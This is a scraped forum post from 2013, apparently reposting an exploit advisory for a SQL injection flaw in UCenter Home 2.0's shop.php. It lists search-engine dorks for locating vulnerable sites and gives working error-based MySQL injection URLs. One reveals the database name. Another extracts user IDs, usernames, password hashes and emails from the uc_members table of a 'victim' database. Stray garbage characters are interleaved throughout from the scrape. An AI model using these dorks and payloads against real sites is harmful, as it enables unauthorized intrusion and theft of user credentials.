+ \( P0 j H# g+ p8 x
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ " W6 p; u" n7 E
" p0 E4 r% f* I5 h) _% F
; n3 y" ]' r* v! R0 ?8 `, l& p1 O* H. ^& v5 p& _' {, X
*/ Author : KnocKout . ?: m4 v1 S" G; C- d
% P! H U( O- e* y1 r*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
4 Y4 z; P( v- V" G+ D! \1 x' c1 } T& x% G H4 S
*/ Contact: knockoutr@msn.com ! L/ i/ q, n K5 I' Q. ~. D. P
3 X9 W. L/ L1 S2 S! q! O6 u) G
*/ Cyber-Warrior.org/CWKnocKout , Y+ S4 b3 i; d6 ~2 Z1 E
! K: g1 p1 U/ L: I7 K0 m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- [) k2 g3 [6 \: Y
7 n8 {0 g6 {: F2 sScript : UCenter Home
2 M, N0 a# u" h+ B* G0 ?* ^% z' y( k! m. N
Version : 2.0 8 [. d( V3 ^7 G- g; h( U/ \
+ j* R" `5 j1 n: [Script HomePage : http://u.discuz.net/
- k: [4 w7 ^" A" l* L4 |2 W3 p( y" A) N& b. o
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; U5 j8 @# s4 L6 Q E9 u* f! ?; E1 {
Dork : Powered by UCenter inurl:shop.php?ac=view
2 q, j. w# a3 L$ ^
: W6 t' }5 h* R' WDork 2 : inurl:shop.php?ac=view&shopid=
}6 f' ?3 R b5 g5 j
" P/ H# L1 `4 ~/ T* x5 i9 Z- i__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; X' ^. ^% |" `8 K% l! ?
+ L: H3 U% k2 M( b' ?
Vuln file : Shop.php 8 s% y, _7 a7 G1 _
0 L1 F2 H/ V# B, o2 v: C' \
value's : (?)ac=view&shopid= + `) H f( }" Q& J/ n
$ |: S& L2 Q9 @1 G
Vulnerable Style : SQL Injection (MySQL Error Based)
7 _( X$ h+ k: o- c
5 r1 N# E6 j9 c( b" a6 ?& `+ g) kNeed Metarials : Hex Conversion
, Q0 A2 {: P8 A' A; ]
1 r, h% Y0 t5 _' Y. ]) j Z$ y- z__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
8 r; B. ~" c/ c8 y. P
& Y8 s+ g- b6 q I/ f; iYour Need victim Database name.
9 h" z. h' j3 e: r) J
; J6 h% v- R# zfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
# T0 y# v1 R+ F8 d4 i- W) ?" @0 j; z
..
7 U* X3 E/ x3 ~3 I; L
: N4 D- V( b( | Y. zDB : Okey.
3 v5 z" j: t+ c7 Q/ `& q/ R- V2 k* U6 u
your edit DB `[TARGET DB NAME]`
, `, B( }0 o/ K/ t t
1 }) M1 i7 R" {& j" cExample : 'hiwir1_ucenter'
, J% {3 I% a" s
" }% C2 k- z0 p% X2 E% sEdit : Okey.
( H' p) y. L0 P: B: D( D/ T" d4 F" B/ F/ U
Your use Hex conversion. And edit Your SQL Injection Exploit..
# T# B# \3 b0 @( } H/ b0 ~3 f9 V; R+ \1 D$ |
/ H% O8 \' F/ B R8 g& B4 G* C* c& h# @' W
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1 G5 `' A) ]2 I& A |
发表于 2013-2-27 21:31:31
收藏
支持
反对